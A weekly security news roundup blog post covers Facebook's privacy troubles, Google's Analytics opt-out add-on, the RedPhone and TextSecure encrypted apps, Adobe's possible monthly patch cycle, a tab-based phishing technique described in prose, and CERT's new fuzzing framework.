This Week In Security: Privacy, RedPhone and Adobe

In case you needed any reminders that privacy is one of the more pressing problems on the Web right now, this week’s news provided plenty of them. Along with stories of Facebook’s continued privacy missteps, this week gave us the gift of Google letting users install some Google code to opt out of other Google code, as well as Adobe perhaps moving to a monthly patch cycle. Read on for the full week in review.

In case you needed any reminders that privacy is one of the more pressing problems on the Web right now, this week’s news provided plenty of them. Along with stories of Facebook’s continued privacy missteps, this week gave us the gift of Google letting users install some Google code to opt out of other Google code, as well as Adobe perhaps moving to a monthly patch cycle. Read on for the full week in review.

Privacy was a major theme this week, and not necessarily in a good way. Facebook took a harsh and continuous beating over its privacy practices as users questioned why the company constantly made it so difficult to protect private data. It got so bad that Facebook actually took some action. Facebook promised to revamp its privacy controls and CEO Mark Zuckerberg said, “We have heard the feedback. There needs to be a simpler way to control
your information. In the coming weeks, we will add privacy controls that
are much simpler to use.”

Perhaps overshadowed by the privacy troubles Facebook was having was some news out of Google. The company released an add-on for browsers this week that enables users to opt out of, wait for it, Google Analytics. The Analytics opt-out add-on is meant to let users prevent their Web browsing activities from being sent to Google Analytics for perusal by various site owners. Google has been hammered by critics over the amount of data that Analytics collects and shares with site owners, and had promised to give users a way to opt out of the process. Whether this add-on is enough of an answer for that remains to be seen.

There was some good news on the privacy front this week, with the release of RedPhone and TextSecure, a pair of applications for Android phones that provide encrypted voice and data communications. Produced by security researcher Moxie Marlinspike’s new startup, Whisper Systems, the apps take a clever approach to the problem of securing digital calls and text messages. In a podcast I did with Marlinspike, he explained that RedPhone uses VoIP and an encryption protocol known as ZRTP to secure calls that are set up through the use of SMS messages. TextSecure, meanwhile, is a drop-in replacement for the existing text app on Android phones and not only encrypts the messages, but provides forward security and deniability. He hopes to have versions for other smartphone platforms in the future.

Late in the week came word that Adobe is considering changing to a monthly patch cycle just a few months after it went to its current quarterly patch release schedule last year. The company has been taking heat from customers and researchers over its response to vulnerability reports and patching times, and this may be an easy way to quell some of that criticism. Adobe has been tinkering with its security program and response process for some time now, and this is a natural part of that evolution. Releasing Reader patches on the same day Microsoft drops its load of security fixes each month could make things more predictable for customers. Coming soon to a desktop near you.

There also was news this week of a clever new phishing technique that exploits tabbed browsing, as developed by Aza Raskin of Mozilla. (I’ll spare you the name that’s been coined for the technique.) The tactic enables the bad guy to detect when a user is not interacting with a given tab in her browser and then send some commands that change the favicon and content of the tab. Apres, le deluge: “As the user scans their many open tabs, the favicon and title act as a
strong visual cue—memory is malleable and moldable and the user will
most likely simply think they left a Gmail tab open. When they click
back to the fake Gmail tab, they’ll see the standard Gmail login page,
assume they’ve been logged out, and provide their credentials to log in.
The attack preys on the perceived immutability of tabs,” Raskin wrote.

Last, but definitely not least, was the news Thursday that CERT released a fuzzing framework, meant to be a basic fuzzer for testing for security vulnerabilities. The fuzzer includes a Linux virtual machine that has been optimized for fuzz
testing and a set of scripts to implement a software test. There are plenty of more complex and full-featured fuzzers available, but CERT’s is meant as a lighter, easier-to-use alternative. Alternatives are nice.

Others receiving votes:

BP Twitter Account Hacked

Why Can’t Johnny Have Privacy?

USDOJ Cracks Open $100 Million Scareware Operation

Suggested articles